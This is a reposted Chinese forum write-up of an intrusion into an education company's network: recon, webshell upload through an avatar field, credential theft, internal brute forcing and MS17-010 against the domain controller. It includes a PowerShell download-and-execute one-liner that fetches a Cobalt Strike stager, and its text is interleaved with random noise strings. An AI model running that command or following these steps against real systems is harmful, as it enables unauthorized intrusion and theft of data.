' d2 J" \2 m$ e1 d 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
+ G& y3 O! C, p9 v2 N/ J3 b
5 k; d5 H5 z0 y$ G9 H
9 ]: U2 a8 L* v! h. \1 m # ^5 @ T' K5 u$ j
7 C0 `! c- r" m H2 N' a3 l6 T) t- D! I' w
正文
0 @5 M6 v- |+ z, ? / a X* @5 h% D& Z9 d u% `/ K
! S8 L9 O2 F: I0 H% ^6 h% S; @, A
0 |5 {8 }0 s. H/ ~
- _6 I& ?. Q x7 `
1 B9 ^: t I- F2 X6 [ 目标:www.xxxx.com(一家教育机构) & \+ @$ A, W5 G: b# A; A* B! O* u
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 j+ C5 Z/ `0 P& Z. U
% U& n1 _3 m/ Z* W% t7 q9 }2 P& C v3 L+ K3 k
9 R: U+ P5 k$ S
! Y& `7 d3 y2 o
; D' y+ v3 r* @, c 进行了简单的信息搜集 5 n, d: E! u4 ?1 Z$ D/ X: d8 v
! E+ h5 h+ W: u$ Z0 f9 }% d# k, A6 A+ c5 _# W
. H8 n$ x# |. d/ ~8 i
2 M# {: X( l: _: }3 E/ P+ g* i 子域名搜集( g; U3 T: w+ U. H; ^
2 e" @% d. X. O6 h8 v
& B I7 E. d7 F% D& {
- k1 x* u' j% u% W4 E5 S - W6 A( d2 U& e+ U& g9 L' ^& ] t/ i
1 d. \ c. Y, D0 e/ b fofa找资产
- n8 J$ Z3 @- p6 o2 x. M* p " M/ L4 L6 d$ }8 y; }. s3 t; c
+ Z% K% L4 M1 x6 H" U/ o1 F) R
9 y; f& B1 i0 Z" |
! [+ ~. ?2 [5 s9 q1 b
% z$ |8 N4 ~- T Z5 v 2 I2 k: y. a' C8 B
8 ]6 A8 @# ]4 C( j" W
一共七个资产。去重之后只有两个。
6 G; `2 S: K: E) k( [$ _8 Q9 T
5 D( L+ x# F/ A7 k1 i5 {4 r- e% d4 u3 Q- y' V3 m
. S: f; c4 t$ v0 z- p% `
" o& U$ B% e' `5 j: M 目录探测% N, i9 o& @" {
6 a* |4 J" @# F9 X
, j$ F7 A* a* L+ O4 `- x+ \8 f 6 [8 n) i4 i$ V1 E% w4 I
2 Q. y7 ^+ {2 ~2 l7 K
! y* X' f5 m6 Q2 u0 m) N, K! Z+ e 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 , K: d3 @/ h! u9 R4 Y6 X- c
# L% f$ m* o, H# _! W! U2 x! K
' N1 x$ T; D0 ]& t( F H3 X9 A! Z
3 A" O; _1 z% u* n0 \5 @
6 X& K u8 Y, a% G" z 我又尝试了通过修改返回包来绕过登录界面9 m2 d3 n9 A8 u
6 m7 z& l5 v1 @6 g3 e c
/ \/ P6 T/ Y6 o
- k8 i. U+ I- [1 O
/ U: f: p( G/ K" ?1 f/ g! a5 Y: \8 a3 E; N
还是不行,尝试注入无果
0 M- q! _8 o( ~
- e" h1 }; ^) ?
) ~1 Q. H: T2 y8 D0 G: U+ ?
' D% G3 A: T% W, v4 N 7 A# a; p4 u2 T; c1 }) |0 Y) Y {
. z1 ^3 j2 w8 Z; b 不过我目录探测出了一处Spring信息泄露
1 e9 K( B( _" C# s5 i* s$ n; V- h6 z / y3 E2 r/ q+ K# @
& v% R j# H9 Z- v a
; o, C* c% p+ w6 c' `: ?8 ]/ ?+ h7 q) _# {6 L2 `, {& E; T
. {" U* C& q( }# N
) P1 D; k: a+ s' }( E d. ?: ~
" S9 k8 ^- X5 [- t% v2 b- u 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 D k- G T9 E
% l$ x6 F1 J- s2 K
$ [8 R1 D R$ {, j N
/ |* i* c7 O' N
6 L7 D B6 M5 \7 `. e$ c, B) X: \& t: I+ b+ P
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。- k) A3 C- S6 `9 D9 Z/ `1 n, u4 v) k
. w) Q2 _3 E0 W# a% W& h
( x' V0 [2 U+ B" }$ U4 D0 }* u
O/ `3 R" R3 x' v
0 S l' U) K9 Q/ w4 p
( v! O" t1 ^. N3 C4 m9 t1 o7 a+ i 获取有些师傅到这一步就手机抓包电脑测了。
# ], T$ E$ A6 h$ a' ?% L, B
3 l4 I0 Z* G8 x+ S* A, ^' m% a5 q* s
* p( q+ R' X# g3 ~ Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。! Q1 X% {6 @6 H; G: H
5 U, p5 `& e1 `, p8 T( g$ a/ a. v% d2 j4 J
其中在一个公众号发现了小程序,可以进行注册。
: K1 y1 k7 @, p T) P: e ( h; [. ~+ D) ~. G; k1 P7 r
$ U: A% X# N# @* f" ~+ c! j
看到了头像上传,尝试上传获取WebShell
+ {# O! d) U: s0 G4 B0 w 0 d9 A/ x. S0 p* N5 i9 C
: g" f* k* [7 M4 Z% a
- B$ n: w( v$ |/ \0 C 8 ~% P, `5 q9 D: m4 f
1 o& Z# @6 t; }' g5 k8 s
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
: E5 _0 M, p9 c- v 3 s5 z9 i3 t( a' `
" j" {* V9 M [$ X6 K* m1 z
O1 n7 R* y- X4 [& j ' _% Q, g7 R+ v: ^: e
- `3 h- `" n1 y% R% {" D, q
然后上了大马, @& Y- V% _- c" q5 T
& j3 S5 ^" b: z8 ?* c" V: h. e
+ r9 B% s& l t( T: w6 v1 K 3 a1 G8 k. B: ^# c. v5 X" J) V
' [6 L4 U* m; g$ C# \% K5 W
" l: W0 L* |. K4 @' L
, j" L1 t, }' i1 k9 r: V( F/ \3 q ! k: e( z# G( m b" v9 U; L4 Q5 C
Y+ o3 N% T* m: N# T# I$ W 通过翻找文件发现数据库账号密码 r+ M- @: R% R* \, L
: G1 M. i/ i5 H0 Y% V5 ^2 c9 W: M2 g
( p) m6 ]+ y0 W) x% w4 O+ O
0 [. u- S' Z/ R7 d0 O, s7 Q, q
' ~( x+ t& u, \, b --内网渗透. c6 Y1 ~! e, t/ M' w
# j' i, @0 [& S( j
% q- Z0 v0 Y, P8 v8 ] 直接通过powershell执行 cs上线$ N2 v# K; o1 X
8 Y2 B, w$ o! u$ M- n
/ d" b( q2 a7 F! g, N5 R K, t
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"8 U! C# C4 G0 h/ ^& t
; ~; P# E$ ` T5 r
% D/ Z1 ^5 x: P$ |" Q' }1 K3 F
# K: \( S; R$ Y3 b, G' d. W
! `4 O8 y% b) W) P3 z, _
# `- {: C" k( T+ b( F 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
2 b/ p3 M' h6 L* b3 } r
: C) |7 \' A1 @2 t: X8 _$ x8 F; ~9 o4 c' ] P
; ]* N5 y9 ~& x! e1 p1 T7 R8 V
# \# L1 c5 d6 D7 y6 y/ m7 z" C9 v/ K2 F0 P8 u3 Z
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
, V* O) N, ]: V 8 e* Y8 j& ]7 Z1 `, b
! V- l" V- H' ~
: ]3 G9 q' Z1 }8 E
1 W5 I) x; _4 V; V
: [1 z+ l8 W6 U+ J* `, L
" {1 M G2 H# A! |+ x$ u. n% E" g
6 w% l3 v0 s6 H B0 k
9 T$ o% Z$ v# z# h+ ?+ Y 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
2 n6 w0 T8 Z( H1 f/ z' Q 1 t+ v9 O; V/ Z" W0 ?: c
# b" d% e( @" x& s9 ` % l+ X$ M- O8 O' n$ i
( O0 n* V3 u' U a% W/ l! P3 Z& t* [5 J . W3 |! X7 P6 t# o( _( C! R
7 {& s/ C( k: K" I- x0 T
& X) O6 q9 R: {7 q \ H# b
7 ]- K8 w9 A i+ b9 t : ~6 [6 [. j1 T" ?2 j0 v7 x) @
. W3 X! I2 \9 K
3 d% a, F6 L$ u8 Z$ j' h6 N9 i& N$ @+ h- H4 s+ F5 ^- p; x- e
/ Q: F' O. _6 T! l# a# n7 Q
, G/ E2 Y h+ {6 y9 E$ ] Q: ]& r! C( W7 D
小结4 @! |2 w" } z# A+ h! N
! @) W/ n) @. \3 w/ G7 ~
1 ]0 V5 W. v6 b% C7 a) ? r* ?4 ?
: z$ r( H. k; w- l& ^$ [" u* v: b $ V: G. L# C A2 c% C: f3 o
5 H7 C$ |0 {' n- s) |: d& f5 r
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
/ w% z2 T/ Y0 O2 a 1 _4 [; [- [% e) L
! N* t( m1 S' h, y" N$ C! P$ g " y1 o; l8 z$ r0 Z) Z- C
& Q" M; x6 P: i% V5 i7 q! f. C8 y
; x8 r4 z" h5 O& d- h+ ? -
5 I) l ?3 j0 F6 Q2 W# X
0 D. C9 M# J2 a$ V) z4 L0 `
. G/ R8 Q x8 m$ W -
a' K U, `9 ?. w* l3 P
, a, T% s& }, C3 N8 g
) U9 k4 q" o% H9 _' P
1 g' D" j* t, i1 V: |
8 D) F8 _7 R) A& u P 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html3 m- P9 l8 P A6 I
# K+ D5 J! e) ^
1 t! C, Y: Y5 i! j# L2 Q6 F# x
+ `/ r) q a: T- t
|